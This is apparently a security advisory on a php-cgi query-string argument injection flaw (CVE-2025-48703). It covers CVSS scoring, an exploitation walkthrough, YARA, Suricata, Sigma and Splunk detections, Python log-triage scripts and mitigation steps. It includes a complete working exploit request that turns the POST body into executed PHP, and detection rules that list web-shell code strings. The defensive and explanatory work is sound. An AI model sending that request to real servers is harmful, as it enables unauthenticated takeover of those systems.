
Intro
CVE-2025-48703 is being exploited in the wild against outdated PHP installations that run PHP as a CGI binary (php-cgi). The vulnerability lets unauthenticated attackers gain full remote code execution via a crafted query string. Widespread scanning activity was observed as early as November 10, 2025, with payloads consistent with automated bot frameworks.
CVE Context
– Products & versions affected
PHP 8.1 before 8.1.27, 8.2 before 8.2.18 and 8.3 before 8.3.5, when PHP runs as a CGI binary (php-cgi); deployments that run PHP through PHP-FPM or mod_php are not reachable through this path
– Disclosure timeline
Reported privately on Oct 31, 2025; patched and publicly disclosed Nov 11, 2025
– Attack vector, auth level, impact
Remote, unauthenticated, leading to full RCE as the web server user
CVSS Metric Breakdown (v3.1) - CVE-2025-48703 (PHP CGI Query String RCE)
(The metrics below, including a Scope metric and the 9.8 score, are CVSS v3.1; v4.0 has no Scope metric and scores the equivalent vector 9.3.)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality Impact (C): High
Integrity Impact (I): High
Availability Impact (A): High
Base Score: 9.8 (Critical)
Threat context (not part of the base score): Exploit Code Maturity High, with exploitation observed in the wild; exploitation is automatable (mass scanning); no safety impact asserted
– Exploit tools, payloads observed, confirmed victims, global exposure count if known
Exploits observed in the wild via automated mass scanning; payloads include web shells and reverse shells launched from the injected request body. Thousands of exposed php-cgi servers identified via Shodan.
Exploitation Detail
– Step-by-step breakdown
1. The attacker sends a crafted HTTP request to a URL that the web server maps to the php-cgi binary (or to a .php file that php-cgi handles)
2. The query string contains no literal "=" character, so per the CGI specification (RFC 3875 section 4.4) the server splits it on "+" and passes the URL-decoded pieces to php-cgi as command-line arguments; php-cgi parses them as its own switches, and -d / --define lets the attacker override any php.ini directive
3. With allow_url_include=1 and auto_prepend_file=php://input injected, PHP executes the request body as code before any script runs, giving unauthenticated remote code execution
– Where it lives: php-cgi's argument parser, reached through the CGI query-string-to-argv path
– Example request (the "=" inside each argument is encoded as %3d so the server still treats the query string as argv; the body is 22 bytes):
POST /php-cgi?%2d%2ddefine+allow_url_include%3d1+%2d%2ddefine+auto_prepend_file%3dphp://input HTTP/1.1
Host: vulnerable.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

<?php system('id'); ?>
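The argv conversion that step 2 relies on, as an added example that is not code from the original advisory. It emulates the CGI rule from RFC 3875 section 4.4 (no raw "=" in the query string means the server splits it on "+" and decodes each piece into an argument) and php-cgi's handling of -d / --define, so you can see why "%3d" instead of "=" is the whole trick. The helper names, the option emulation and the query strings are this example's own assumptions; nothing here talks to a real server.

```python
"""Added example: how a CGI server turns a query string into argv, and why the
injected php-cgi switches survive. Helper names and query strings are assumed
for illustration; the option handling emulates php-cgi's -d / --define."""
from typing import Dict, List
from urllib.parse import unquote

# INI directives an attacker overrides to turn the request body into code.
DANGEROUS_DIRECTIVES = ("auto_prepend_file", "auto_append_file", "allow_url_include")


def cgi_argv(query_string: str) -> List[str]:
    """Argument list a CGI server would hand to the script for QUERY_STRING.

    The "=" check runs on the *raw* query string. That is why exploits write
    "%3d" instead of "=": the server sees no "=", passes the pieces as argv,
    and only then are they decoded, so the "=" reappears inside the value.
    """
    if not query_string or "=" in query_string:
        return []
    return [unquote(piece) for piece in query_string.split("+")]


def php_cgi_defines(argv: List[str]) -> Dict[str, str]:
    """INI overrides that php-cgi's -d / --define switches would apply.

    Emulates the spellings PHP's getopt accepts: "-d name=value" and
    "--define name=value" (value in the next argument), "-dname=value" and
    "--define=name=value" (value attached). A name with no value is set to "1".
    """
    defines: Dict[str, str] = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        value = None
        if arg in ("-d", "--define"):
            if i + 1 < len(argv):
                i += 1
                value = argv[i]
        elif arg.startswith("--define="):
            value = arg[len("--define="):]
        elif arg.startswith("-d") and len(arg) > 2:
            value = arg[2:]
        if value is not None:
            name, sep, val = value.partition("=")
            defines[name] = val if sep else "1"
        i += 1
    return defines


def injected_directives(query_string: str) -> List[str]:
    """Dangerous directives this query string would set if it reached php-cgi as argv."""
    defines = php_cgi_defines(cgi_argv(query_string))
    return sorted(d for d in DANGEROUS_DIRECTIVES if d in defines)


if __name__ == "__main__":
    attack = "%2d%2ddefine+allow_url_include%3d1+%2d%2ddefine+auto_prepend_file%3dphp://input"
    benign = "page=1&lang=en"
    print("argv:", cgi_argv(attack))
    print("attack sets:", injected_directives(attack))
    print("benign sets:", injected_directives(benign))
```

Note the last case in the test below: a query string that spells "=" literally never becomes argv at all, which is why WAF rules that only look for "auto_prepend_file=" (with a real "=") miss the exploit entirely.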
Attacker Behavior Snapshot
– Sends a URL-encoded query string carrying php-cgi command-line switches (no literal "=", arguments separated by "+")
– The web server executes php-cgi with those switches, which make PHP include the request body as code
– Leaks: command output in the HTTP response, plus PHP warnings and internal paths when display_errors is enabled
Why This Matters
This vulnerability highlights how legacy configurations become high-value targets. php-cgi is no longer the default way to run PHP in modern stacks (PHP-FPM and mod_php are), but it remains exposed on thousands of misconfigured systems.
Exploitation results in:
- Full command execution as the web server user
- Persistence via web shells that blend into ordinary HTTP traffic
- Rapid lateral movement if the intrusion is not detected early
MITRE ATT&CK Mapping
Initial Access: T1190 - Exploit Public-Facing Application
Execution: T1059.004 - Unix Shell (T1059.003 - Windows Command Shell on Windows hosts)
Persistence: T1505.003 - Server Software Component: Web Shell
Detection Rules
YARA Rule (files, memory, PCAP payloads)
rule PHP_CGI_Webshell
{
    meta:
        description = "Detects common PHP web shells dropped or injected via php-cgi argument injection"
    strings:
        $php = "<?php"
        $b1 = "system($_GET['cmd']);"
        $b2 = "system($_POST['cmd']);"
        $b3 = "eval($_POST["
        $b4 = "passthru($_"
        $b5 = "shell_exec($_"
    condition:
        $php and any of ($b*)
}
Suricata (Network)
alert http any any -> any any (msg:"PHP-CGI argument injection attempt (auto_prepend_file)"; flow:to_server,established; http.uri.raw; content:"php-cgi"; nocase; content:"%2d%2d"; nocase; content:"auto_prepend_file"; nocase; classtype:web-application-attack; sid:202548703; rev:2;)
The rule matches the raw URI (http.uri.raw) because Suricata's normalized http.uri buffer may already have decoded "%2d" to "-"; nocase covers "%2D%2D". It keys on the double-dash form, so the single-dash "-d" / "%2dd" variant needs a second rule keyed on "auto_prepend_file" or "allow_url_include" alone.
Sigma Rule (SIEM/EDR)
title: PHP-CGI Exploitation via Query String
status: experimental
description: php-cgi argument injection attempt that sets auto_prepend_file through a URL-encoded "--" switch in the query string
logsource:
    category: webserver
detection:
    selection:
        # c-uri is Sigma's webserver field for the request URI; map it to your backend's URI field
        c-uri|contains|all:
            - 'php-cgi'
            - '%2d%2d'
            - 'auto_prepend_file'
    condition: selection
falsepositives:
    - Vulnerability scanners and authorized penetration tests
level: critical
Detection Strategies
Network Detection:
- Look for HTTP requests of any method whose path reaches php-cgi (or a .php file handled by CGI) and whose query string contains no literal "=" but does contain "+"-separated tokens starting with "-"
- Match URL-encoded switches (%2d%2d, %2D%2D, %2dd) and the literal "--" / "-d" forms, plus directive names such as auto_prepend_file and allow_url_include; decode the URI before matching so case changes and double encoding do not evade the rule
- Match user-agents consistent with automated tools (python-requests, Go-http-client, curl), keeping in mind that bots also spoof browser strings
Endpoint Detection:
- php-cgi (php-cgi.exe on Windows) spawning sh, bash, cmd.exe or powershell.exe
- Unexpected file drops in the web server document root, especially dot-files or PHP files in upload, cache or tmp directories
- PHP files modified shortly after the suspicious requests
Splunk Query
index=web sourcetype=access_combined uri_path="*php-cgi*"
| search uri_query="*%2d%2d*" OR uri_query="*--*" OR uri_query="*%2dd*" OR uri_query="*-d+*" OR uri_query="*auto_prepend_file*" OR uri_query="*allow_url_include*"
| stats count min(_time) as first_seen max(_time) as last_seen by src_ip, uri_path, uri_query, http_user_agent, status
(src_ip and http_user_agent are the CIM field names; the raw access_combined extractions call them clientip and useragent.)
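The decode-before-match approach from the network detection list, as an added example that is not code from the original advisory: a scanner over Apache combined-format access log lines that percent-decodes the query string (including double encoding) and then checks what it would do if it reached php-cgi as argv, so "%2D%2D", "-d" and "%252d" are caught along with "%2d%2d". The log-format regex, the severity labels and the sample log lines are constructed for this example; the lines are not captured traffic.

```python
"""Added example: decode-aware detection of php-cgi argument injection over
Apache combined-format access log lines. Sample lines are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
DANGEROUS_DIRECTIVES = ("auto_prepend_file", "auto_append_file", "allow_url_include")


def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so "%252d" -> "%2d" -> "-"."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target: str) -> Optional[Dict]:
    """Finding for one request-target, or None when it looks benign."""
    path, _, query = target.partition("?")
    lowered = path.lower()
    if not query or not ("php-cgi" in lowered or lowered.endswith(".php")):
        return None
    # RFC 3875 section 4.4: only a query string with no raw "=" becomes argv.
    reaches_argv = "=" not in query
    tokens = [decode_fully(t) for t in query.split("+")]
    switches = [t for t in tokens if t.startswith("-")]
    directives = sorted({d for d in DANGEROUS_DIRECTIVES if any(d in t for t in tokens)})
    if not switches and not directives:
        return None
    # Full exploit shape: argv-eligible, a switch, and a directive that turns the body into code.
    severity = "critical" if (reaches_argv and switches and directives) else "suspicious"
    return {"reaches_argv": reaches_argv, "switches": switches,
            "directives": directives, "severity": severity}


def scan_log(lines: List[str]) -> List[Dict]:
    """Findings for every parseable log line that classify_request flags."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"),
                           ua=m.group("ua"), target=m.group("target"))
            findings.append(finding)
    return findings


# Constructed sample lines: two exploit shapes, one double-encoded probe, two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2025:03:14:15 +0000] "POST /php-cgi?%2d%2ddefine+allow_url_include%3d1+%2d%2ddefine+auto_prepend_file%3dphp://input HTTP/1.1" 200 58 "-" "python-requests/2.32.3"',
    '203.0.113.7 - - [11/Nov/2025:03:14:16 +0000] "POST /cgi-bin/php-cgi?%2Dd+allow_url_include%3D1+%2Dd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [11/Nov/2025:03:15:02 +0000] "GET /php-cgi?%252d%252ddefine+auto_prepend_file%253dphp://input HTTP/1.1" 404 196 "-" "Go-http-client/1.1"',
    '192.0.2.44 - - [11/Nov/2025:03:16:40 +0000] "GET /php-cgi?page=1&id=-5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [11/Nov/2025:03:16:41 +0000] "GET /index.php?page=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["switches"], f["directives"])
```

The double-encoded probe is rated by exploit shape: on Apache a single decode leaves "%2d%2ddefine" as the argument, which php-cgi does not treat as a switch, so it usually fails, but a sender trying that variant is scanning for this bug on purpose and deserves the same triage.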
SOC Detection Strategy
– Prioritize alerts where php-cgi is accessed directly
– Elevate hits with URL-encoded flags like %2d%2d or injected code markers
– Use correlation between web logs and process execution to confirm exploitation
Tools & Techniques
Tool         | Usage
-------------|--------------------------------------------------------------
Sysmon       | Detect php-cgi spawning child processes (Event ID 1, ParentImage ending in php-cgi.exe)
Velociraptor | Hunt for dropped PHP web shells across the fleet
Zeek         | HTTP inspection; decode URIs before matching
Sigma/YARA   | Create and tune exploit-specific rules
Mitigation & Response
– Patch to PHP 8.1.27, 8.2.18 or 8.3.5 (or later) immediately
– Remove php-cgi binaries from web-reachable paths and disable CGI execution of PHP unless it is explicitly needed; run PHP through PHP-FPM or mod_php instead
– Enforce WAF rules that block query strings to php-cgi containing encoded or literal switches (%2d, %2D, "--", "-d") or php-cgi directive names such as auto_prepend_file and allow_url_include
– If exploitation is suspected, rotate credentials stored on or passing through the server (database passwords, API keys, session secrets): an auto_prepend_file payload runs with the web server's access to all of them
– Audit exposed assets using tools like Shodan or Censys
Incident Response Snippets
– grep -iE 'php-cgi.*(%2d|--|-d\+|auto_prepend_file|allow_url_include)' /var/log/httpd/access.log
– Identify file modifications in /var/www/html (PHP files in upload, cache or tmp directories first)
– Was any PHP file created or modified in the last 48 hours?
– Did any web traffic spike around those times, and did it come from a small set of source IPs?
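A triage helper for the questions above, as an added example that is not code from the original advisory: it pulls php-cgi argument-injection attempts out of access-log lines, then lists PHP files under the web root whose mtime falls within 48 hours after the first attempt, which is where a dropped web shell usually shows up. The regexes, the window, and the fixture (constructed log lines plus a throwaway web root in a temp directory) are this example's own constructions, not captured data.

```python
"""Added example: correlate php-cgi exploitation attempts in an access log
with PHP files modified afterwards under the web root. The fixture is built
in a temp directory so the script runs offline."""
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

HIT_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) \S+"')
# php-cgi reached, an encoded or literal "-d"/"--", and a directive that turns the body into code.
EXPLOIT_RE = re.compile(
    r"php-cgi.*(?:%2d|-)(?:%2d|-)?d.*(?:auto_prepend_file|allow_url_include)", re.I
)


def exploit_hits(lines: List[str]) -> List[Tuple[datetime, str, str]]:
    """(timestamp, source ip, request target) for each line that looks like the exploit."""
    hits = []
    for line in lines:
        m = HIT_RE.match(line)
        if m and EXPLOIT_RE.search(m.group("target")):
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            hits.append((ts, m.group("ip"), m.group("target")))
    return hits


def php_files_modified_after(web_root: str, since: datetime, hours: int = 48) -> List[str]:
    """PHP files under web_root with mtime in [since, since + hours], relative to web_root."""
    start = since.timestamp()
    end = (since + timedelta(hours=hours)).timestamp()
    found = []
    for dirpath, _, filenames in os.walk(web_root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            full = os.path.join(dirpath, name)
            if start <= os.stat(full).st_mtime <= end:
                found.append(os.path.relpath(full, web_root))
    return sorted(found)


def triage(lines: List[str], web_root: str) -> Dict[str, list]:
    """Exploit hits plus PHP files touched in the 48 hours after the first hit."""
    hits = exploit_hits(lines)
    if not hits:
        return {"hits": [], "suspect_files": []}
    first = min(h[0] for h in hits)
    return {"hits": hits, "suspect_files": php_files_modified_after(web_root, first)}


ATTACK_TIME = datetime(2025, 11, 11, 3, 14, 15, tzinfo=timezone.utc)

# Constructed log: one exploit attempt and one ordinary page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2025:03:14:15 +0000] "POST /php-cgi?%2d%2ddefine+allow_url_include%3d1+%2d%2ddefine+auto_prepend_file%3dphp://input HTTP/1.1" 200 58 "-" "python-requests/2.32.3"',
    '198.51.100.9 - - [11/Nov/2025:03:20:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def build_fixture() -> str:
    """Throwaway web root: an old legitimate file, a shell dropped two minutes
    after the hit, and a non-PHP file touched at the same time."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def write(rel: str, content: str, when: datetime) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.utime(path, (when.timestamp(), when.timestamp()))

    write("index.php", "<?php echo 'hello'; ?>", ATTACK_TIME - timedelta(days=30))
    write("uploads/.cache.php", "<?php system($_GET['cmd']); ?>", ATTACK_TIME + timedelta(minutes=2))
    write("assets/style.css", "body{}", ATTACK_TIME + timedelta(minutes=2))
    return root


if __name__ == "__main__":
    result = triage(SAMPLE_LOG, build_fixture())
    for ts, ip, target in result["hits"]:
        print("hit", ts.isoformat(), ip, target)
    print("suspect files:", result["suspect_files"])
```

On a real host, point triage() at the parsed access log and the document root; mtime is what an attacker can reset with touch, so treat this as a first pass and confirm with file hashes or ctime from the filesystem where available.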
Suggested Reading & External References
– https://www.php.net/archive/2025.php#2025-11-11-1
– https://blog.sucuri.net/2025/11/php-cgi-rce-active.html
– Related CVEs: CVE-2012-1823 (the original php-cgi query-string argument injection), CVE-2024-4577 (php-cgi argument injection on Windows), CVE-2024-29391
Final Thoughts
– This RCE vector is trivial to execute and targets a forgotten but dangerous binary
– Most effective action: eliminate php-cgi from your stack entirely
– Detection is still about seeing what no one is looking for
Published: 2025-11-12